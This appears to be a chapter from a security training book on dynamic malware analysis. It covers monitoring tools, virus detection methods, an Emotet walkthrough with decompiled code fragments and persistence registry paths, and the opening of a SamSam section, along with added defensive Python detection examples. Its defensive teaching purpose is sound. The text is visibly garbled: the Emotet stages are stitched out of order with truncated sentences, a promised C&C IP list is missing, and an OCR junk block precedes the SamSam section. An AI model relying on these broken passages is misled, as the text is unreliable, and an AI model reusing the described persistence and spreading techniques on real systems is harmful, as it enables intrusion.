Mirekusoft Install Monitor automatically monitors what is placed on your system and allows you to uninstall it completely. It works by monitoring resources (such as file and registry) that are created when a program is installed. It provides detailed information about the software installed. Furthermore, it helps you to determine the disk, CPU, and memory consumption of your programs. It also provides information about how often you use different programs. A program tree is a useful tool that can show you which programs were installed together.

Figure 7.86: Screenshot of Mirekusoft Install Monitor

Some additional installation monitoring tools are as follows:
- SysAnalyzer (https://www.aldeid.com)
- Advanced Uninstaller PRO (https://www.advanceduninstaller.com)
- REVO UNINSTALLER PRO (https://www.revouninstaller.com)
- Comodo Programs Manager (https://www.comodo.com)
Malware Analysis: Dynamic Files and Folders Monitoring

Files and Folders Monitoring

Malware can modify the system files and folders to save some information in them. You should be able to find the files and folders that the malware creates and analyze them to collect any relevant stored information. These files and folders may also contain hidden program code or malicious strings that the malware would schedule for execution according to a specified schedule.

Scan for suspicious files and folders using tools such as PA File Sight, Tripwire, and Netwrix Auditor, to detect any Trojans installed as well as system file modifications.

PA File Sight
Source: https://www.poweradmin.com
PA File Sight is a file protection and auditing tool. It detects ransomware attacks coming from the network and stops them.
Features:
- Compromised computers are blocked from reaching files on other protected servers on the network
- Detects users copying files and optionally blocks access
- Real-time alerts allow appropriate staff to investigate immediately
- Monitors who is deleting, moving, or reading files

Figure 7.87: Screenshot of PA File Sight

Some additional file integrity checking tools are as follows:
- Tripwire File Integrity and Change Manager (https://www.tripwire.com)
- Netwrix Auditor (https://www.netwrix.com)
- Verisys (https://www.ionx.co.uk)
- CSP File Integrity Checker (https://www.cspsecurity.com)
- NNT Change Tracker (https://www.newnettechnologies.com)
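Both the installation monitoring section (traces left behind by an install or uninstall) and the file integrity checking section come down to the same mechanism: hash a baseline of the tree, rescan after the sample runs, and report added, removed and modified files. The following is an added example of that mechanism (not code from Tripwire, Netwrix Auditor, PA File Sight or any installation monitor above); the directory tree it scans is constructed in a temporary folder.

```python
"""Tripwire-style integrity check: hash every file under a directory tree,
then compare a later scan to find added, removed and modified files.

Added example for the installation-monitoring and files-and-folders
monitoring sections above, not code from any tool named there. The tree is
constructed in a temporary folder so the script runs offline."""
import hashlib
import os
import tempfile
from typing import Dict, List


def hash_file(path: str, chunk: int = 1 << 16) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hash_tree(root: str) -> Dict[str, str]:
    """Map each file's path (relative to root, '/'-separated) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def compare_trees(before: Dict[str, str], after: Dict[str, str]) -> Dict[str, List[str]]:
    """Added = present only after; removed = present only before;
    modified = present in both with a different hash."""
    return {
        "added": sorted(p for p in after if p not in before),
        "removed": sorted(p for p in before if p not in after),
        "modified": sorted(p for p in after if p in before and after[p] != before[p]),
    }


def demo() -> Dict[str, List[str]]:
    """Simulate a baseline of a small 'system' tree, then an installation that
    drops a new executable, changes a system file and removes another file.
    Paths and contents are constructed for the demonstration."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel: str, data: bytes) -> None:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)

        write("Windows/System32/hosts", b"127.0.0.1 localhost\n")
        write("Windows/System32/drivers/etc.dat", b"benign driver data")
        before = hash_tree(root)

        # The suspicious "installation" happens here.
        write("ProgramData/Updater/update.exe", b"MZ constructed sample")
        write("Windows/System32/hosts", b"127.0.0.1 localhost\n10.0.0.9 intranet\n")
        os.remove(os.path.join(root, "Windows/System32/drivers/etc.dat"))
        after = hash_tree(root)

        return compare_trees(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice the baseline is stored off-host (a snapshot of the clean VM or a signed database), since a sample that can write to the tree can also rewrite a baseline kept beside it.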
Malware Analysis: Dynamic Device Drivers Monitoring

Device Drivers Monitoring

Malware is installed on the system along with the device drivers when the user downloads infected drivers from untrusted sources. The malware uses these drivers to avoid detection. One can scan for suspicious device drivers using tools such as DriverView and Driver Detective, to verify whether they are genuine and whether they have been downloaded from the original publisher's site.

Figure 7.88: Screenshot displaying Windows System Drivers

DriverView
Source: https://www.nirsoft.net
The DriverView utility displays the list of all device drivers currently loaded in the system. For each driver in the list, additional information is displayed, such as load address of the driver, description, version, product name, and maker.
Features:
- Displays the list of all loaded drivers in your system
- Standalone executable

Figure 7.89: Screenshot of DriverView

Some additional device driver monitoring tools are as follows:
- Driver Booster (https://www.iobit.com)
- Driver Reviver (https://www.reviversoft.com)
- Driver Easy (https://www.drivereasy.com)
- Driver Fusion (https://treexy.com)
- Driver Genius (http://www.driver-soft.com)
Malware Analysis: Dynamic Network Traffic Monitoring/Analysis

Network Traffic Monitoring/Analysis

Network analysis is the process of capturing network traffic and investigating it carefully to identify malware activity. It helps to determine the type of traffic/network packets or data transmitted across the network.

Malware depends on the network for various activities such as propagation, downloading malicious content, transmitting sensitive files and information, and offering remote control to attackers. Therefore, you should adopt techniques that can detect malware artifacts and usage across networks. Some malware connects back to the handlers and sends confidential information to them.

In dynamic analysis, you run a piece of malware in a controlled environment that is installed with various network monitoring tools to trace all the networking activities of the malware. Network monitoring tools such as SolarWinds NetFlow Traffic Analyzer, Capsa Network Analyzer, and Wireshark can be used to monitor and capture live network traffic to and from the victim's system during execution of the suspicious program. This will help to understand the malware's network artifacts, signatures, functions, and other elements.

SolarWinds NetFlow Traffic Analyzer
Source: https://www.solarwinds.com
NetFlow Traffic Analyzer collects traffic data, converts it into a useable format, and presents it to the user in a web-based interface for monitoring network traffic.
Features:
- Network traffic analysis
- Bandwidth monitoring
- Application traffic alerting
- Performance analysis
- CBQoS policy optimization
- Malicious or malformed traffic flow identification

Figure 7.90: Screenshot of SolarWinds NetFlow Traffic Analyzer

Some additional network activity monitoring tools are as follows:
- Capsa Network Analyzer (https://www.colasoft.com)
- Wireshark (https://www.wireshark.org)
- PRTG Network Monitor (https://kb.paessler.com)
- GFI LanGuard (https://www.gfi.com)
- NetFort LANGuardian (https://www.netfort.com)
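The "connects back to the handlers" behaviour described above shows up in flow data as beaconing: the same host contacting the same destination on a fixed timer. The following added example (not code from NetFlow Traffic Analyzer, Capsa or Wireshark) scores each (source, destination, port) group by how regular its connection gaps are; the flow records are constructed.

```python
"""Spot beaconing (periodic call-backs to a handler) in captured flows.

Added example for the network traffic monitoring section above; not code from
NetFlow Traffic Analyzer, Capsa or Wireshark. The flow records are constructed
inline in a NetFlow-like shape: (timestamp_s, src, dst, dst_port, bytes)."""
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

Flow = Tuple[float, str, str, int, int]

# Constructed capture: host 10.0.0.21 browses a web server at irregular times
# and also calls 203.0.113.45:8080 every ~60 s with a same-sized request;
# host 10.0.0.22 only browses.
FLOWS: List[Flow] = [(t, "10.0.0.21", "203.0.113.45", 8080, 412)
                     for t in (0, 60, 121, 180, 241, 300, 361, 420)]
FLOWS += [(t, "10.0.0.21", "198.51.100.10", 443, size)
          for t, size in ((5, 18000), (9, 2300), (130, 91000), (131, 4400), (400, 12000))]
FLOWS += [(t, "10.0.0.22", "198.51.100.10", 443, 5000) for t in (7, 8, 300)]


def beacon_candidates(flows: List[Flow], min_connections: int = 6,
                      max_jitter: float = 0.1) -> List[Dict]:
    """Group flows by (src, dst, dst_port) and report groups whose
    inter-connection gaps are nearly constant: coefficient of variation
    (stdev / mean) of the gaps at most `max_jitter`. Human-driven traffic
    has bursty, irregular gaps; a timer-driven call-back does not."""
    groups: Dict[Tuple[str, str, int], List[Tuple[float, int]]] = defaultdict(list)
    for ts, src, dst, dport, nbytes in flows:
        groups[(src, dst, dport)].append((ts, nbytes))

    findings = []
    for (src, dst, dport), conns in groups.items():
        if len(conns) < min_connections:
            continue
        times = sorted(ts for ts, _ in conns)
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "dport": dport,
                "connections": len(conns),
                "period_s": round(mean, 1),
                "jitter": round(jitter, 3),
                # identical request sizes every time strengthen the case
                "constant_size": len({n for _, n in conns}) == 1,
            })
    return findings


if __name__ == "__main__":
    for f in beacon_candidates(FLOWS):
        print(f"{f['src']} -> {f['dst']}:{f['dport']} every {f['period_s']}s "
              f"({f['connections']} connections, jitter {f['jitter']}, "
              f"constant size: {f['constant_size']})")
```

Real malware adds random jitter to its sleep, so raise `max_jitter` and lower `min_connections` with care: a looser threshold catches more samples but also software update checks and mail polling, which is why the destination still has to be examined by hand.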
Malware Analysis: Dynamic DNS Monitoring/Resolution

DNS Monitoring/Resolution

Malicious software such as DNSChanger can change the system's DNS server settings, thus providing attackers with control of the DNS server used in the victim's system. Subsequently, the attackers can control the sites to which the user tries to connect through the Internet, make him/her connect to a fraudulent website, or interfere with his/her online web browsing. Therefore, you should determine whether the malware is capable of changing any DNS server settings while performing dynamic analysis. You can use tools such as DNSQuerySniffer and DNSstuff to identify the DNS servers that the malware tries to connect to and the type of connection.

DNSQuerySniffer
Source: https://www.nirsoft.net
DNSQuerySniffer is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: host name, port number, query ID, request type (A, AAAA, NS, MX, and so on), request time, response time, duration, response code, number of records, and content of the returned DNS records. You can easily export the DNS query information to a CSV/tab-delimited/XML/HTML file or copy the DNS queries to the clipboard and then paste them into Excel or other spreadsheet applications.

Figure 7.91: Screenshot of DNSQuerySniffer

Some additional DNS monitoring/resolution tools are as follows:
- DNSstuff (https://www.dnsstuff.com)
- DNS Lookup Tool (https://www.ultratools.com)
- Sonar Lite (https://constellix.com)
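Once the DNS queries are exported, the question from the section above is whether any of them went to a resolver the analyst never configured. The following added example (not code from DNSQuerySniffer or DNSstuff) answers that over a constructed CSV export that carries a `resolver` column; the configured resolver address and the host names in the log are constructed, the latter mirroring the screenshot.

```python
"""Check captured DNS queries for resolvers the analyst did not configure.

Added example for the DNS monitoring section above; not code from
DNSQuerySniffer or DNSstuff. The query log is constructed inline as CSV with a
'resolver' column (the DNS server the query was sent to), which is the field to
watch for the DNSChanger behaviour described in the text."""
import csv
import io
from collections import Counter
from typing import Dict, List

# Resolver configured on the lab image before the sample ran (constructed).
EXPECTED_RESOLVERS = {"10.0.0.2"}

# Constructed log: the first host names mirror the DNSQuerySniffer screenshot
# above; the last three queries go to a resolver that was never configured.
QUERY_LOG = """host,type,resolver,response_code
login.microsoftonline.com,A,10.0.0.2,NOERROR
go.microsoft.com,A,10.0.0.2,NOERROR
beacons.gvt2.com,A,10.0.0.2,NOERROR
update-check.example,A,198.51.100.53,NOERROR
cdn-assets.example,AAAA,198.51.100.53,NXDOMAIN
login.microsoftonline.com,A,198.51.100.53,NOERROR
"""


def parse_queries(text: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(io.StringIO(text)))


def analyze(queries: List[Dict[str, str]], expected=EXPECTED_RESOLVERS) -> Dict:
    """Summarise which resolvers were used. A resolver outside `expected`
    means the sample (or something it launched) changed the DNS settings or
    talks to a DNS server of its own. A name resolved through both the
    expected and a rogue resolver is the one to compare answer-for-answer,
    since that is how a hijack to a fraudulent site would show up."""
    per_resolver = Counter(q["resolver"] for q in queries)
    rogue = {r: n for r, n in per_resolver.items() if r not in expected}
    hosts_via_rogue = sorted({q["host"] for q in queries if q["resolver"] in rogue})
    hosts_via_expected = {q["host"] for q in queries if q["resolver"] in expected}
    return {
        "rogue_resolvers": rogue,
        "hosts_via_rogue": hosts_via_rogue,
        "resolved_both_ways": sorted(set(hosts_via_rogue) & hosts_via_expected),
        "nxdomain": sum(1 for q in queries if q["response_code"] == "NXDOMAIN"),
    }


if __name__ == "__main__":
    result = analyze(parse_queries(QUERY_LOG))
    for resolver, count in result["rogue_resolvers"].items():
        print(f"unexpected resolver {resolver}: {count} queries")
    print("hosts queried via rogue resolver:", result["hosts_via_rogue"])
    print("compare answers for:", result["resolved_both_ways"])
```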
Malware Analysis: Dynamic API Calls Monitoring

API Calls Monitoring

Application programming interfaces (APIs) are parts of the Windows OS that allow external applications to access OS information such as file systems, threads, errors, registry, kernel, buttons, mouse pointer, network services, web, and the Internet. Malware programs also use these APIs to access the OS information and cause damage to the system. You need to gather the APIs related to the malware programs and analyze them to reveal their interaction with the OS as well as the activities they have been performing over the system. Use API call monitoring tools such as API Monitor to monitor API calls made by applications.

API Monitor
Source: https://www.apimonitor.com
API Monitor is a software that allows you to monitor and display Win32 API calls made by applications. It can trace any exported API and it displays a wide range of information, including function name, call sequence, input and output parameters, function return value, etc. It is a useful developer tool for understanding how Win32 applications work and for learning their tricks.

Figure 7.92: Screenshot of API Monitor

Some additional API monitoring tools are as follows:
- APImetrics (https://apimetrics.io)
- Runscope (https://www.runscope.com)
- AlertSite (https://smartbear.com)
Virus Detection Methods

The rule of thumb for virus and worm detection is that if an email seems suspicious (i.e., if the user is not expecting an e-mail from the sender and does not know the sender), or if the email header contains something that a known sender would not usually say, the user must be careful about opening the email, as there might be a risk of virus infection. The MyDoom and W32.Novarg.A@mm worms have infected the systems of many Internet users, mostly through e-mail.

The best methods for virus detection are as follows:
- Scanning
- Integrity checking
- Interception
- Code Emulation
- Heuristic Analysis

Furthermore, a combination of these techniques can be more effective.

Scanning

A virus scanner is an essential software for detecting viruses. In the absence of a scanner, it is highly likely that the system will be attacked by a virus. Run antivirus tools continuously and update the scan engine and virus signature database on a regular basis. Antivirus software is of no use if it does not know what to look for. The scanning for virus detection is performed in the following ways:
- Once a virus is detected in the wild, antivirus vendors across the globe identify its signature strings (characteristics).
- The vendors start writing scanning programs that look for the virus's signature strings.
- The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus.
- Some scanners set up a virtual computer in a machine's RAM and test the programs by executing them in this virtual space. This technique, called heuristic scanning, can also check and remove messages that might contain a computer virus or other unwanted content.

Advantages of scanners
- They can check programs before execution.
- They are the easiest way to check new software for known or malicious viruses.

Drawbacks of scanners
- Old scanners may be unreliable. With the rapid increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available in the market.

Integrity Checking
- Some integrity checkers combine antivirus techniques with integrity checking to create a hybrid tool. This simplifies the virus checking process.

Interception
- The primary objective of an interceptor is to deflect logic bombs and Trojans.
- The interceptor controls requests to the OS for network access or actions that cause threats to programs. If it finds such a request, it pops up and asks if the user wants to allow the request to continue.
- Interception does not work for input and output instructions issued by the virus. Some viruses can disable the monitoring program itself.

Code Emulation
- Using code emulation, antivirus software executes a virtual machine to mimic CPU and memory activities. Here, virus code is executed on the virtual machine instead of the real processor. Code emulation efficiently deals with encrypted and polymorphic viruses. After the emulator is run for a long time, the decrypted virus body eventually presents itself to a scanner for detection. It also detects metamorphic viruses (single or multiple encryptions). A drawback of code emulation is that it is too slow if the decryption loop is very long.

Heuristic Analysis
- This method helps in detecting new or unknown viruses that are usually variants of an already existing virus family. Heuristic analysis can be static or dynamic. In static analysis, the antivirus tool analyzes the file format and code structure to determine if the code is viral. In dynamic analysis, the antivirus tool performs code emulation of the suspicious code to determine if the code is viral. The drawback of heuristic analysis is that it is prone to too many false positives (i.e., it tags benign code as viral); thus, a user might mistrust a positive test result and mistakenly assume a false alarm when a real attack occurs.
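The relationship between scanning and code emulation described above can be shown in a few lines: a signature scan finds a known body in the clear, misses the same body once it is encrypted, and finds it again once the sample's own decoder has been run. The following is an added example, not the book's material: the "virus" is a harmless marker string, and the XOR decoder-stub layout is a toy invented here (a real emulator executes the sample's actual decryption loop instruction by instruction).

```python
"""Why scanners need code emulation: a signature scan finds a known body in
the clear but misses the same body once it is encrypted, while running the
sample's own decoder (emulation) exposes the decrypted body to the scanner.

Added example for the Scanning and Code Emulation sections above; the
'virus' is a harmless marker string and the XOR decoder stub format is a toy
invented here (a real emulator executes the sample's actual decryption loop)."""
from typing import Dict, List, Optional

# Constructed signature database: name -> byte string a scanner looks for.
SIGNATURES: Dict[str, bytes] = {
    "ToyMarker.A": b"TOY-MARKER-BODY-v1",
    "OtherMarker.B": b"ANOTHER-KNOWN-STRING",
}

STUB_MAGIC = b"XORSTUB1"   # toy decoder stub: magic | key(1) | len(2, LE) | body


def scan(buf: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Plain signature scan: report every signature found in the buffer."""
    return sorted(name for name, sig in signatures.items() if sig in buf)


def encode_with_stub(body: bytes, key: int) -> bytes:
    """Produce the toy 'encrypted' variant: decoder stub + XOR-encoded body.
    This stands in for the polymorphic packing the text describes."""
    encoded = bytes(b ^ key for b in body)
    return STUB_MAGIC + bytes([key]) + len(encoded).to_bytes(2, "little") + encoded


def emulate_decoder(buf: bytes) -> Optional[bytes]:
    """Run the decoder the sample carries: if a stub is present, return the
    body it would produce in memory; otherwise None. A truncated stub (the
    failure mode a real emulator must also survive) yields None."""
    pos = buf.find(STUB_MAGIC)
    if pos < 0:
        return None
    hdr = pos + len(STUB_MAGIC)
    if len(buf) < hdr + 3:
        return None
    key = buf[hdr]
    length = int.from_bytes(buf[hdr + 1:hdr + 3], "little")
    encoded = buf[hdr + 3:hdr + 3 + length]
    if len(encoded) != length:
        return None
    return bytes(b ^ key for b in encoded)


def scan_with_emulation(buf: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Scan the raw buffer and, if the sample decodes itself, the decoded body too."""
    hits = set(scan(buf, signatures))
    decoded = emulate_decoder(buf)
    if decoded is not None:
        hits.update(scan(decoded, signatures))
    return sorted(hits)


# Constructed samples: the marker in the clear, and the same marker encoded.
PLAIN_SAMPLE = b"MZ...harmless padding..." + b"TOY-MARKER-BODY-v1" + b"...more padding"
ENCODED_SAMPLE = b"MZ...harmless padding..." + encode_with_stub(b"TOY-MARKER-BODY-v1", 0x5A)


if __name__ == "__main__":
    print("plain, signature scan:     ", scan(PLAIN_SAMPLE))
    print("encoded, signature scan:   ", scan(ENCODED_SAMPLE))
    print("encoded, scan + emulation: ", scan_with_emulation(ENCODED_SAMPLE))
```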
Trojan Analysis: Emotet
Source: https://www.fortinet.com

Emotet Malware Attack Phases

The various phases and corresponding stages involved in an Emotet malware attack are as follows:
- Infection
- Maintaining Persistence
- System Compromise
- Network Propagation

Figure 7.93: Emotet infection flow process

Emotet Malware Attack Phases: Infection Phase

Infection Phase

Stage 1: Initial Infection

Initial infection occurs through macro-enabled document files, malicious scripts, malicious links, and spam emails. The spam email is sent to the victim with a malicious URL and it is disguised as a legitimate email, thereby luring the victim into clicking the link.

Figure 7.94: Spam email with malicious content distributing Emotet
Stage 2: Malicious .doc File Download

When the victim clicks the link, it redirects to download a malicious doc file. Thus, the Emotet malware enters the victim's system and starts its attacking process. The original filename of the infected document is PAY09735746167553.doc and it contains malicious VBA code (Visual Basic for Applications) in a macro. The VBA code comes as part of the malicious MS Office document. As soon as the macros are enabled, the code executes in the background. The malicious VBA code is automatically executed using its "autoopen" function once a victim clicks the button "Enable Content". Then, after some time, it generates a ton of PowerShell code and executes it. The actual Emotet file is downloaded from the generated PowerShell code from several URLs, which is generated dynamically as a.
Emotet Malware Attack Phases: Maintaining Persistence Phase
- Stage 5, Encryption: all strings and all imported APIs are encrypted
- Stage 6, Deploying Timer Function: Emotet uses the Windows API SetTimer to enable the callback function, which is called every 1000 milliseconds

Maintaining Persistence Phase

Stage 3: Emotet Relocation and Creation of First culturesource.exe

By default, Emotet malware will be downloaded in the %temp% folder. When it runs, it compares the file path of the current process, and if it is not the same as %LocalAppData%\culturesource\culturesource.exe, it moves the original .exe file from the %temp% folder to the previous folder mentioned, and the file is renamed as culturesource.exe. The word "culturesource" is a constant string decrypted from memory.

The API SHFileOperationW is called to perform the file relocation. This API is called in a timer callback function, which we shall discuss later. The related assembly language (ASM) code snippet is as follows:

    002FFB9A loc_2FFB9A:                              ; CODE XREF: sub_311D78+1F3
    002FFB9A     call    ds:memset
    002FFBA0     call    sub_2F1250                   ; CreateDirectoryW
    002FFBA5     push    1Bh
    002FFBA7     lea     eax, [ebp-20h]
    002FFBAA     push    edi
    002FFBAB     push    eax
    ...
    002FFBCB     mov     dword ptr [ebp-14h], offset word_307EE0 ; %LocalAppData%\culturesource\culturesource.exe
starts running normally, the first one exits. Now, Emotet dynamically releases code and the related data into memory blocks. Here, most of the functions are split into several parts to increase the complexity of the code analysis. As shown in the screenshot below, a normal function is split into seven parts, all of which are connected using "jmp" instructions, to make code analysis more difficult.

Stage 5: Encryption

Figure 7.97: A normal function split into seven parts

Stage 6: Deploying Timer Function

Figure 7.98: Decrypted and loaded string API from user32
    case 1:
        HIDWORD(qword_307C94) = 0;
        if ( sub_2F6BA0() )                       // check_process_is_in_correct_path()
            goto LABEL_7;
        sub_2F7170();
        v4 = GetTickCount() % 0xBB8u;             // 0xBB8 = 3000
        v5 = GetTickCount();
        HIDWORD(qword_307C94) = 2;
        LODWORD(qword_307C94) = v4 + v5 + 3000;
        break;
    case 2:
        HIDWORD(qword_307C94) = 0;
        if ( sub_2F8300() && sub_2F8430() && sub_2F8820() && sub_2F9580()
          && sub_2FA320() && sub_2FB750() && sub_2F6800() )
        {
            dword_307CC4 = (int)&unk_3080E8;
            dword_307CC8 = 106;
            dword_307CCC = (int)&unk_303430;
        }
        v6 = GetTickCount() % 0xBB8u;
        v7 = GetTickCount();
        HIDWORD(qword_307C94) = 3;
        LODWORD(qword_307C94) = v6 + v7 + 3000;
        break;
    case 3:
        HIDWORD(qword_307C94) = 0;
        v8 = GetTickCount();
        v9 = sub_2FCB20();
        HIDWORD(qword_307C94) = 3;
        LODWORD(qword_307C94) = v9 + v8;
        break;
    case 4:
        SetEvent(dword_304C0C);
        break;
    default:
        return;
Another purpose is to set up a Windows service named "culturesource" for running Emotet at Windows startup, when it can open the Service Control Manager successfully (by calling the API OpenSCManagerW). Meanwhile, "culturesource.exe" is moved to the folder "%windir%\system32".

In the above code snippet:
- Case 1 is used to initialize several DLL modules and decrypt the exported API functions that Emotet uses, including "urlmon.dll", "wininet.dll", and so on.

During this stage, Emotet maintains persistence using two methods: the system service and the auto-run in the system registry, and executes commands from the C&C server. Emotet creates the auto-run entry named "culturesource" under the following sub-keys in the system registry to maintain persistence and access the victim's machine even after reboot:
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Figure 7.101: Screenshot of the added auto-run entry "culturesource" in the Registry Editor
Emotet Malware Attack Phases: System Compromise Phase

System Compromise Phase

Stage 7: Communication with C&C Server

In stage 6, in case 0, it is coded to call several APIs and collect the system information such as computer name, file system, and volume by calling the APIs GetComputerNameW and GetVolumeInformationW. It puts the two data sets together and saves them in a global variable, which is used in the C&C server as the ID for this victim. This ID will then be used in the packets that communicate with the C&C server. Emotet then calculates a CRC32 of its EXE file and saves it in another global variable, which is used when sending the first packet to the C&C server.
the value with a blue underscore is the length of the following data, which uses a type of UTF-8 encoding.

Figure 7.102: Put data together in a structure

After receiving the transferred information from the infected victim's machine, the C&C server checks if there are analysis tools (such as Wireshark and debuggers) running on the victim's machine. If any such tools are detected, it will not reply with any data; otherwise, it will provide the required malicious instructions and deploy the contagious payload. As can be seen in the screenshot, the C&C server replies with the instruction data.

Figure 7.103: Send collected data to C&C server
The IP list of C&C servers is hardcoded into its memory and saved in a global variable. Each IP and port pair uses 8 bytes, and there are 62 C&C servers in total. The list of hardcoded IP and port pairs is as follows:
Stage 8: System Compromise

After receiving the malicious instructions or malicious payload from the malicious C&C server, Emotet upgrades itself and exploits the system. In this stage, Emotet actually compromises the victim's machine.
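The API calls named across the Emotet stages above (SHFileOperationW for the relocation, SetTimer for the callback, OpenSCManagerW and the Run-key write for persistence, GetComputerNameW and GetVolumeInformationW for the victim ID) are exactly what an API Monitor trace from the earlier API Calls Monitoring section would show. The following added example (not code from API Monitor or from the Fortinet analysis) turns such a trace into behaviour tags; the trace format, the paths and the return values are constructed, and CreateServiceW and RegSetValueExW are real Win32 APIs assumed here to complete the persistence steps.

```python
"""Triage an API-call trace for the behaviours described in the Emotet
analysis above (self-relocation, timer-driven execution, service and Run-key
persistence, host fingerprinting for the C&C victim ID).

Added example serving the API Calls Monitoring section and the Emotet stages;
not code from API Monitor or from the Fortinet analysis. The trace is
constructed inline in a simple 'seq;module;api;args;return' form, not API
Monitor's own export format."""
from typing import Dict, List, NamedTuple


class Call(NamedTuple):
    seq: int
    module: str
    api: str
    args: str
    ret: str


# Constructed trace; API names follow the stages in the text, paths and
# handles are illustrative.
TRACE = """\
1;kernel32.dll;GetComputerNameW;(lpBuffer, 16);TRUE
2;kernel32.dll;GetVolumeInformationW;("C:\\", ...);TRUE
3;shell32.dll;SHFileOperationW;(FO_MOVE "C:\\Users\\user\\AppData\\Local\\Temp\\PAY.exe" -> "C:\\Users\\user\\AppData\\Local\\culturesource\\culturesource.exe");0
4;user32.dll;SetTimer;(NULL, 0, 1000, TimerProc);1
5;advapi32.dll;OpenSCManagerW;(NULL, NULL, SC_MANAGER_CREATE_SERVICE);0x0045a1c8
6;advapi32.dll;CreateServiceW;(hSCManager, "culturesource", ...);0x0045a3f0
7;advapi32.dll;RegSetValueExW;(HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, "culturesource", REG_SZ, "C:\\Users\\user\\AppData\\Local\\culturesource\\culturesource.exe");ERROR_SUCCESS
"""


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        seq, module, api, args, ret = line.split(";", 4)
        calls.append(Call(int(seq), module, api, args, ret))
    return calls


def triage(calls: List[Call]) -> Dict[str, List[int]]:
    """Map behaviour tags to the trace sequence numbers that support them."""
    found: Dict[str, List[int]] = {}

    def tag(name: str, call: Call) -> None:
        found.setdefault(name, []).append(call.seq)

    for c in calls:
        a = c.args.lower()
        if c.api == "SHFileOperationW" and "\\appdata\\local\\" in a:
            tag("relocates_itself_to_user_dir", c)      # stage 3
        elif c.api == "SetTimer":
            tag("timer_callback_execution", c)          # stage 6
        elif c.api == "CreateServiceW":
            tag("service_persistence", c)               # service "culturesource"
        elif c.api == "RegSetValueExW" and "\\currentversion\\run" in a:
            tag("run_key_persistence", c)               # auto-run entry
    # The victim ID needs both pieces of information, as stage 7 describes;
    # either call alone is common in benign software, so tag only the pair.
    apis = {c.api for c in calls}
    if {"GetComputerNameW", "GetVolumeInformationW"} <= apis:
        for c in calls:
            if c.api in ("GetComputerNameW", "GetVolumeInformationW"):
                tag("collects_host_fingerprint", c)
    return found


if __name__ == "__main__":
    for behaviour, seqs in triage(parse_trace(TRACE)).items():
        print(f"{behaviour:32} evidence: calls {seqs}")
```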
Emotet Malware Attack Phases: Network Propagation Phase

Network Propagation Phase

Stage 9: Network Propagation

After infecting the victim's device, Emotet's next key objective is to spread the infection across local networks and beyond to compromise as many machines as possible. Currently, Emotet uses five known spreader modules: NetPass.exe, Outlook Scraper, WebBrowserPassView, Mail PassView, and a credential enumerator.
- NetPass.exe: It is a legitimate utility developed by NirSoft. It recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives.
- Outlook Scraper: It is a tool that extracts names and email addresses from the victim's Outlook account and uses this information to send out additional phishing emails from the compromised account.
- WebBrowserPassView: It is a password recovery tool that captures passwords stored by web browsers such as Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. It can pass them to the credential enumerator module.
- Mail PassView: It is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo! Mail, and Gmail, and passes them to the credential enumerator module.
- Credential Enumerator: It is a self-extracting RAR file containing two components. One component is the bypass and the other is the service component. The bypass component is used for the enumeration of network resources, and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force user accounts, including the administrator account. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet's access to SMB can result in the infection of entire domains (servers and clients).

Emotet employs some or all of these network propagation techniques depending on the target machine and network. After infecting the possible machines in the network, Emotet performs the same phases as those discussed above to compromise the machines.
Indicators of Compromise (IoC) for Emotet:

This malicious Word document has been detected as "VBA/Agent.AFD!tr.dldr" and the original Emotet file has been detected as "W32/Emotet.GBUK!tr" by the FortiGuard AntiVirus.
Virus SamSamRansomware
Analysis:
ansorware
employs
Protea!
Propagation paste
weak
password
ofRemote
estoy
Samsam
ROP)
toga azn
ute ore ats
the
the
‘Virus SamSamRansomware
Analysis:
Source:https://www.secureworks.com
SamSam ransomware is also known as Samas or SamSamCrypt. It is a notorious ransomware that is associated with the GOLD LOWELL threat group for performing targeted attacks against global multi-national companies. It exploits vulnerable unpatched servers present in the target network using a range of exploitation methods. SamSam ransomware attacks skyrocketed in 2018, although the ransomware was developed and released in 2016. In 2018, it was shrewd enough to capture wide media attention by targeting a specific range of top-class organizations across the globe. Unlike other ransomware, this ransomware does not attack the victims on a random basis. It is a targeted ransomware that specifically targets certain reputed companies. In spite of knowing this, large multi-national companies were unable to defend themselves against this attack. This ransomware not only affected the operations of government organizations, schools, and the healthcare sector but also affected common people by encrypting their crucial medical records required for proper diagnosis. As with any other ransomware, after infiltrating into a system, it encrypts the files and prevents the users from using those files until a heavy ransom is paid in bitcoins. This ransomware does not have a specified ransom pricing. After infecting systems, the attackers demand a ransom depending on the type of victim.
Propagation:
